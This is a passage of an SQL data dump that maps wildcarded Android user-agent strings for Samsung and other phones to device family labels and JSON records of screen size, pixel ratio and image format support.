Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SHV-E160L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SHV-E210K/KKUGND3) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SHV-E210S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SHV-E250K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SHV-E250L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SHV-E250L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SHV-E250S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SHV-E250S) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SHV-E300S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SHV-E310L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SHV-E330S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SHV31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SHW-M570S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SKY 4.0D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SKY 5.0W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SLIDE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-A3009) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-A300F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-A300FU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-A300H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-A300H) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-A300M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-A5000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-A500F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-A500FU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-A500H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-A500M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-A500Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-A7000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-A700F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-A700FD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-A700YD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-C101) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-C111) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-C111M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-C115) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-E500F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_e','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-E500H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_e','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-E500M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_e','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-E7000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_e','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-E700F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_e','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-E700H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_e','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G110B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G110H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G110M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G130BT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G130BU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G130BU) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G130E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G130E) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G130H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G130H) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G130HN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G130HN) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G130M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G310HN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G313F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G313H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G313H) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G313HN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G313HU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G313HU) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G313HZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G313HZ) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G313M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G313M) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G313ML) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G313ML) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G313MU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G313MU) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G316HU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G316HU) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G316M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G316M) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G316ML) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G316ML) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G316MY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G316U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G318H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G318HZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; SM-G318ML) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}');
